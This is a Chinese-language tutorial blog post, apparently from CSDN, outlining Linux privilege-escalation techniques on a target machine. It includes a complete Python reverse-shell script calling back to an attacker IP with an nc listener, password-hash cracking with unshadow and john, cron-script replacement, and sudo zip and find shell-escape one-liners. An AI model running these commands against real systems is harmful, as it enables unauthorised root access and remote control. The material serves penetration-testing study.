Linux提权思路

当获得目标机器低权限时,可通过检查系统版本和内核漏洞进行提权。利用内核溢出漏洞,编译并执行exploit文件;尝试明文root密码破解,查看定时任务以替换root执行文件;搜索敏感信息如账号密码进行远程登录;利用SUID位权限提升,如zip命令或find命令进行提权操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

提权思路


  • 当我们已经获取目标机器的较低权限时,我们需要扩大战果来提升权限。

  1. 查看系统发行版本cat /etc/issue或者cat /etc/*-release,查看内核信息uname -a。根据版本信息使用searchsploit xxx来查询发行的内核版本是否存在内核溢出漏洞,如果存在漏洞可以直接利用漏洞代码来提升权限:
    * 上传漏洞代码,使用gcc xxx.c -o exploit将代码编译成名为exploit的可执行文件
    * chmod +x exploit赋予执行权限
    * ./exploit执行漏洞进行提权
  2. 明文root密码提权,查看/etc/shadows里面存储密码的hash(一般只有root权限可读),如果可以查看到shadow里面的密码:
    * 进入etc目录下
    * 使用unshadow passwd shadow >cracked
    * john cracked进行破解密码
  3. 计划任务,系统中会存在一些定时执行的任务,可以使用cat /etc/crontab查看定时任务,是否可以替换root定时执行的文件来获取root权限。如果存在.py文件可以使用如下python脚本代替。攻击机上使用nc -nlvp 4444监听4444端口
    *
    #!/usr/bin/python
    import socket,subprocess,os  
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("攻击机ip",4444))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1);
    os.dup2(s.fileno(),2);
    p=subprocess.call(["/bin/bash","-i"]);
    
  4. 密码复用,对靶机上的信息进行查看,看看是否存在一些网页配置文件,数据库配置文件。如果存在,查看是否有账号密码等敏感信息,可以尝试靶机开放ssh服务的情况下进行远程登录。
  5. root提权命令,使用sudo -l可以查看当前用户可以执行的root提权命令,如果存在就可以使用相关命令进行提权。下面使用zip压缩命令进行举例:
    * mkdir exp新建一个文件夹
    * sudo -u root zip exp.zip exp -T -unzip-command="sh -c /bin/bash"
    * find / -name 1.txt -exec "whoami" \;find提权find / -name 1.txt -exec "/bin/sh" \;
  6. 利用SUID位进行提权find / -perm -u=s -type f 2>/dev/null查找具有SUID的程序进行提权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值